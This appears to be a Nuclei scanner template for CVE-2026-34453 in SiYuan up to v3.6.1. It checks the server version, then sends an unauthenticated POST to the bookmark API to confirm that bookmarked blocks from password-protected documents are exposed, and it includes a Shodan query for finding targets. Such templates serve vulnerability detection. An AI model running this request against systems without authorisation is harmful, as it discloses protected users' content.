id: CVE-2026-34453 info: name: SiYuan <= v3.6.1 - Bookmark Data Disclosure author: 0x_Akoko severity: high description: | SiYuan v3.6.2 contains an information disclosure vulnerability caused by improper authorization checks in the publish service's bookmark filtering, letting unauthenticated visitors access bookmarked blocks from password-protected documents, exploit requires access to the publish service. impact: | Unauthenticated attackers can access content from protected documents without a password, exposing sensitive information remediation: | Update to version 3.6.2 or later. reference: - https://github.com/siyuan-note/siyuan/security/advisories/GHSA-c77m-r996-jr3q - https://nvd.nist.gov/vuln/detail/CVE-2026-34453 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2026-34453 epss-score: 0.03649 epss-percentile: 0.88066 cwe-id: CWE-863 metadata: verified: true max-request: 2 vendor: siyuan-note product: siyuan shodan-query: http.favicon.hash:-1450125239 tags: cve,cve2026,siyuan,unauth,disclosure,bac flow: http(1) && http(2) http: - method: POST path: - "{{BaseURL}}/api/system/version" matchers: - type: dsl internal: true dsl: - 'status_code == 200' - 'compare_versions(ver, ">= 0.0.1", "<= 3.6.1")' condition: and extractors: - type: json name: ver internal: true json: - '.data' - raw: - | POST /api/bookmark/getBookmark HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {} matchers-condition: and matchers: - type: word part: body words: - '"code":0' - '"type":"bookmark"' - '"blocks"' condition: and - type: word part: content_type words: - "application/json" - type: status status: - 200 # digest: 4a0a004730450220494c7880231c4aa0cc94db4efc071c7eb694834a9fd44ba198bd58677b2774f50221008fb26410f3693a20a846da4e61843147a2caccadcdfc3f13d1f656b2167e27e7:922c64590222798bb761d5b6d8e72950